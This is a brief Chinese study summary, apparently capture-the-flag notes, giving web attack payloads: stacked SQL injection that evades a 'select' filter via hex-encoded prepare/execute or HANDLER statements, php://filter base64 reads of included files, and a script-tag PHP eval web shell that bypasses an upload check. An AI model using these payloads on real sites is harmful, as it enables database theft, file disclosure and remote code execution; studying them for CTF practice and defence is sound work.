本文主要是介绍学习小结8.25,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
1.堆叠注入能够到列,再要出详细的数据需要构造select语句,如果select被正则匹配拦下,考虑使用
';set@a=16进制编码的查询语句(例如:select * from 表名);prepare execsql from @a;execute execsql;--+
或者
';handler 表名 open as a;handler a read next;--+
2.文件包含中的文件隐藏的flag,使用伪协议做包含
php://filter/convert.base64-encode/resource=文件名
3.文件上传对于<?的检测
可以使用<script language="php">eval($_POST['a'])</script>绕过
这篇关于学习小结8.25的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
